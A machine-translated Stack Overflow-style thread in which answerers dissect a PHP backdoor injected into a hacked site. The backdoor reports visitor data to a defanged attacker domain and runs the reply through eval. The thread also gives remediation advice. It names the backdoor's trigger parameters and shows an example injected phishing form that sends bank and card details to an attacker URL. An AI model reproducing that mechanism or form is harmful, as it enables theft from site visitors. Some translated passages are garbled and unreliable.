Мой сайт был взят хакерами, и, просматривая сайт, в верхней части каждого файла PHP загружается дополнительная информация.
Каждый файл теперь начинается с:
GLOBAL $wehaveitagain; if($wehaveitagain != 1) { Полное дополнение здесь
Кажется, база данных прекрасна, поэтому мне интересно, каков вероятный путь входа, чтобы иметь возможность редактировать мои файлы?
Вы не первый, кто попал в airschk
Эксплоит основан на запросе POST с prgetxr переменной prgetxr .
Если он не установлен (и, вероятно, при обычном использовании сайта он не будет), он будет проходить через эту хэш-карту IP mynetsxx, и если он обнаружит, что запрашивающий IP находится в сети, которая соответствует этому понимаете «сеть», вы должны понимать, как работает сеть, но это, в основном, местные ребята, а не удаленные), и если это так, она вызывает rewrioutclbkxxx . Вы можете вручную запросить этот вызов функции, отправив запрос GET, где значение переменной GET showmeallpls истинно.
rewrioutclbkxxx передается через запуск выходного буфера, поэтому он, вероятно, будет висеть со всеми данными до того, как он будет отправлен, но ПОСЛЕ того, как ваш обычный код будет выполнен, это все.
ОЗНАКОМЬТЕСЬ, ПОЖАЛУЙСТА, ЗНАЧИТЕЛЬНЫЙ ДОМЕН, НИКОГДА НЕ ИМЕЙТЕ, ЕСЛИ ВЫ ЗНАЕТЕ, ЧТО ВЫ ДЕЛАЕТЕ.
Он собирается вытащить данные из hxxp://airschk.com/clk (я подвергал цензуре HTTP в этом URL-адресе), он хочет получить кучу данных, поэтому он отправляет строку, содержащую: user-agent (т. Е. браузер пользователя), их IP-адрес, URL, который они запросили, на какой странице они пришли, и идентификационный код 4dae82ac67843a194c000ca1 который, скорее всего, был настроен для идентификации вашего сервера.
Короче говоря, код отправляет всю информацию об пользовательской информации в airschk и возвращает некоторые данные. Эти данные попадают в EVAL. Бум, ваш сайт pwn'd.
EVAL будет оценивать любую строку, как будто это php. Они могут удалять все, редактировать все, изменять что угодно, возможно даже получать доступ к оболочке. Вы в основном pwnt.
Подождите, что, если мы отправим этот запрос POST туда? О, подлости, они перешли на URL-адрес на toolbarqueries.google.com , но URL-адрес пытается поднять рейтинг страницы Google для URL-адреса (Blackhat SEO, вы можете получить запрет от Google для этого, но в краткосрочной перспективе они получить больше хитов).
airschk . prgetxr и GET showmeallpls . Поскольку они могут редактировать выходной поток ваших файлов по требованию и знать пользовательский агент, а также IP-адрес, они, вероятно, могут отслеживать ваших пользователей. Допустим, вы являетесь банком, и это ваш логин для входа в систему:
<form method="post" action="./login.php"> <input name="BankAccountNumber" /> <input name="Password" /> </form>
Хорошо, переписывание выходного буфера может фактически сохранить все так, как есть, и сделать это для ваших пользователей:
<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p> <form method="post" action="http://example.com/hax/lulz"> <input name="CreditCardNumber" /> <input name="SocialSecurityNumber" /> <input name="FullName" /> <input name="DateOfBirth" /> <input name="HomeAddress" /> <input name="BankAccountNumber" /> <input name="Password" /> <input name="prgetxr" /> </form>
Хорошо, я бы сказал, что вашему серверу больше не нужно доверять. Удалите проклятую вещь с орбиты и переустановите резервную копию.
У вас нет резервной копии? Что с тобой не так? Поместите резервную копию на место после того, как вы наняли кого-то, чтобы расчесывать каждую строку кода, каждую запись базы данных и каждый последний файл, установленный в вашей системе, потому что больше эксплойтов может быть где угодно . Nuke проклятую вещь и установить резервную копию.
Затем задайте настройки chmod, чтобы эти файлы не редактировались кем-либо, кроме учетной записи, которая НЕ является веб-учетной записью. Вам нужно понять безопасность unix.
Затем удалите этот проклятый eval из любого файла, который выполняется на вашем сервере ( возможно, даже настройте suhosin ). Если у вас есть какой-либо исполняемый код, который зависит от него, вы все равно ошибаетесь. Убери это. Тебе нужно.
Меры по оказанию банды будут блокировать хакерский домен, но это совершенно бесполезно за 12 часов, они могут просто переместиться в другое место и, вероятно, к настоящему времени.
Я не могу сказать о пути атаки, который они предприняли для этого, так что это совершенно другое расследование и не вопрос для SO.
Безопасность не является тривиальной или простой или быстрой. Не играйте в игры, платите тем, кто знает, что они делают.
Я не знаю, но лучше всего узнать, какие порты открыты на вашем компьютере. Веб-сайт, который я часто использую для тестирования брандмауэров и т. Д., – http://www.auditmypc.com/firewall-test.asp, поскольку он дает вам взгляд из внешнего мира.
Проверьте часть загружаемой заявки, если ваш сайт может отправить заявку. Хакер может загрузить сценарий и изменить ваши файлы.